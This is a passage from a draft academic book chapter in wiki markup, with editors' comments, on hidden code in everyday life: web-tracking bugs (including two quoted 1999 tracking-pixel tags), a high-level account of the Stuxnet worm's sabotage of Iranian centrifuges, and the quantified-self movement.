deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence (Madrigal, 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012).&amp;amp;nbsp; These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the ChartBeat company ( [http://chartbeat.com] (http://chartbeat.com/)), it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs (Ghostery 2012b). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code and which is used to essentially shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal 2012). [Eds: please check that the singlee and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of the collection of user statistics. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [Amazon](http://www.businessinsider.com/blackboard/amazon) (e-commerce) is generating $189 per user, at [Google](http://www.businessinsider.com/blackboard/google) (search) it is generating $24 per user and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types, (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [AT&amp;amp;amp;T](http://www.att.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [Right Media](http://www.rightmedia.com/)&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [Burst Media](http://www.burstmedia.com/ )&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types campaigns. Example: [The New York Times](http://www.nytimes.com/)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [BlueKai](http://www.bluekai.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [Experian](http://www.experian.com/) &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [ROILabs](http://www.roilabs.com/) &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [Safecount](http://www.safecount.net/) &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [Google Analytics](http://www.google.com/analytics/) &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [FetchBack](http://www.fetchback.com/)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [Invite Media](http://www.invitemedia.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [AdMeld](http://www.admeld.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [DoubleClick DART](http://www.doubleclick.com/)&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [MediaCom](http://www.mediacom.com/en/home.aspx)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [ClickForensics](http://www.clickforensics.com/) &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [Better Advertising](http://www.betteradvertising.com/)&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma 2010)'' &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform and variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [Turn Media](http://www.turn.com/) is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [BlueKai](http://www.bluekai.com/), [TargusInfo](http://www.targusinfo.com/), [eXelate](http://www.exelate.com/new/index.html), and others (Ghostery 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [readnotify.com](http://readnotify.com/) to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers 2006, Fried 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, certainly is keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately very few companies respect the do not track header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C 2012). Although see the current debate over the EU ePrivacy Directive where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker 2012). &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative direction of travel of these new web bugs under development is called PersianStat ([http://www.persianstat.ir/](http://www.persianstat.com/) ), which claims “an eye on 1091622 websites”, an Iranian web tracking and data analytics website which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprisingly to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies, Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them (Garber 2012, Pew 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies shows that this is an unstable situation. It also serves to demonstrate the extent by which that users are just not aware of the subterranean depths of their computational devices and the ability for these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that meet its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki 2011, mmpc2 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first “weaponized” computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller (60minutes 2012b). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBSNews 2010). Later, a ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (AP 2012). The Stuxnet worm is also interesting because it also has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zett (2011) explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz (Zetter 2011). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government, he says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross 2011). Indeed, the complexities and structure of the worm mean that estimates are that at least thirty people would have been working on it simultaneously to build such a worm (Zetter 2010). Especially one that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens – in actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did.’ (Zetter 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60minutes 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges (60minutes 2012a). &amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to “Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively” (Markoff and Sanger 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60minutes 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins 2011).[10] As Alexander Gostev, reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future (Gostev 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland 2012). This has been usefully described by the Economist, who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying” (Economist 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol (Economist 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
